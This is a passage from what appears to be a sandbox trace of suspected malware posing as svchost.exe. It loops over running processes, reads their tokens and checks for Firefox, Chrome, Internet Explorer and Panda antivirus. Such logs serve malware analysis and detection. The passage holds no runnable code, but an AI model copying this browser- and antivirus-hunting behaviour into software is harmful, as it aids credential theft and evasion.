(lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0133.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0133.836] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.836] CloseHandle (hObject=0x2f0) returned 1 [0133.837] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0134.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11440) returned 0xc0000004 [0134.830] VirtualAlloc (lpAddress=0x0, dwSize=0x12440, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0134.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x12440, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0134.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0134.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0134.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0134.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0134.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0134.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0134.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0134.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0134.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0134.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0134.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0134.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0134.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0134.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0134.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0134.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0134.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0134.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0134.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0134.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0134.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0134.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0134.837] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.837] CloseHandle (hObject=0x2f0) returned 1 [0134.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0134.837] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.837] CloseHandle (hObject=0x2f0) returned 1 [0134.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0134.838] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.838] CloseHandle (hObject=0x2f0) returned 1 [0134.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0134.838] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.838] CloseHandle (hObject=0x2f0) returned 1 [0134.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0134.839] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.839] CloseHandle (hObject=0x2f0) returned 1 [0134.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0134.840] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.840] CloseHandle (hObject=0x2f0) returned 1 [0134.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0134.840] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.840] CloseHandle (hObject=0x2f0) returned 1 [0134.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0134.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0134.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0134.841] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.841] CloseHandle (hObject=0x2f0) returned 1 [0134.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0134.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0134.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0134.841] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.841] CloseHandle (hObject=0x2f0) returned 1 [0134.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0134.842] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0134.842] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0134.842] GetLastError () returned 0x7a [0134.842] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0134.842] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0134.842] CloseHandle (hObject=0x2ec) returned 1 [0134.843] CloseHandle (hObject=0x2f0) returned 1 [0134.843] GetLengthSid (pSid=0x54010a8) returned 0x1c [0134.843] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0134.843] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0134.843] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0134.843] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0134.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0134.843] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0134.844] CloseHandle (hObject=0x2f0) returned 1 [0134.844] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0135.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x113a0) returned 0xc0000004 [0135.858] VirtualAlloc (lpAddress=0x0, dwSize=0x123a0, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0135.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x123a0, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0135.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0135.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0135.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0135.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0135.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0135.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0135.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0135.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0135.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0135.863] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.863] CloseHandle (hObject=0x2f0) returned 1 [0135.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0135.863] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.863] CloseHandle (hObject=0x2f0) returned 1 [0135.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0135.863] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.863] CloseHandle (hObject=0x2f0) returned 1 [0135.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0135.863] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.863] CloseHandle (hObject=0x2f0) returned 1 [0135.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0135.863] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.863] CloseHandle (hObject=0x2f0) returned 1 [0135.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0135.864] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.864] CloseHandle (hObject=0x2f0) returned 1 [0135.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0135.864] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.864] CloseHandle (hObject=0x2f0) returned 1 [0135.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0135.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0135.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0135.864] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.864] CloseHandle (hObject=0x2f0) returned 1 [0135.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0135.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0135.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0135.864] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.864] CloseHandle (hObject=0x2f0) returned 1 [0135.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0135.865] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0135.865] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0135.865] GetLastError () returned 0x7a [0135.865] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0135.865] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0135.865] CloseHandle (hObject=0x2ec) returned 1 [0135.865] CloseHandle (hObject=0x2f0) returned 1 [0135.865] GetLengthSid (pSid=0x54010a8) returned 0x1c [0135.865] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0135.865] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0135.865] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0135.865] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0135.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0135.865] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0135.865] CloseHandle (hObject=0x2f0) returned 1 [0135.866] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0136.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xfa50) returned 0xc0000004 [0136.870] VirtualAlloc (lpAddress=0x0, dwSize=0x10a50, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0136.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10a50, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0136.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0136.875] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.875] CloseHandle (hObject=0x2f0) returned 1 [0136.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0136.875] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.876] CloseHandle (hObject=0x2f0) returned 1 [0136.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0136.876] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.876] CloseHandle (hObject=0x2f0) returned 1 [0136.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0136.876] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.876] CloseHandle (hObject=0x2f0) returned 1 [0136.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0136.876] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.876] CloseHandle (hObject=0x2f0) returned 1 [0136.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0136.876] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.876] CloseHandle (hObject=0x2f0) returned 1 [0136.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0136.877] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.877] CloseHandle (hObject=0x2f0) returned 1 [0136.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0136.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0136.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0136.877] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.877] CloseHandle (hObject=0x2f0) returned 1 [0136.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0136.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0136.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0136.878] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.878] CloseHandle (hObject=0x2f0) returned 1 [0136.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0136.878] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0136.878] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0136.878] GetLastError () returned 0x7a [0136.878] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0136.878] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0136.878] CloseHandle (hObject=0x2ec) returned 1 [0136.878] CloseHandle (hObject=0x2f0) returned 1 [0136.878] GetLengthSid (pSid=0x54010a8) returned 0x1c [0136.878] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0136.878] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0136.879] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0136.879] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0136.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0136.879] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0136.879] CloseHandle (hObject=0x2f0) returned 1 [0136.880] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0137.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xfa50) returned 0xc0000004 [0137.883] VirtualAlloc (lpAddress=0x0, dwSize=0x10a50, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0137.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10a50, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0137.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0137.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0137.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0137.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0137.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0137.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0137.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0137.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0137.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0137.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0137.888] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.888] CloseHandle (hObject=0x2f0) returned 1 [0137.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0137.888] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.888] CloseHandle (hObject=0x2f0) returned 1 [0137.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0137.888] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.888] CloseHandle (hObject=0x2f0) returned 1 [0137.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0137.889] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.889] CloseHandle (hObject=0x2f0) returned 1 [0137.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0137.889] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.889] CloseHandle (hObject=0x2f0) returned 1 [0137.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0137.889] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.889] CloseHandle (hObject=0x2f0) returned 1 [0137.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0137.889] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.889] CloseHandle (hObject=0x2f0) returned 1 [0137.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0137.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0137.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0137.890] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.890] CloseHandle (hObject=0x2f0) returned 1 [0137.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0137.890] OpenProcess 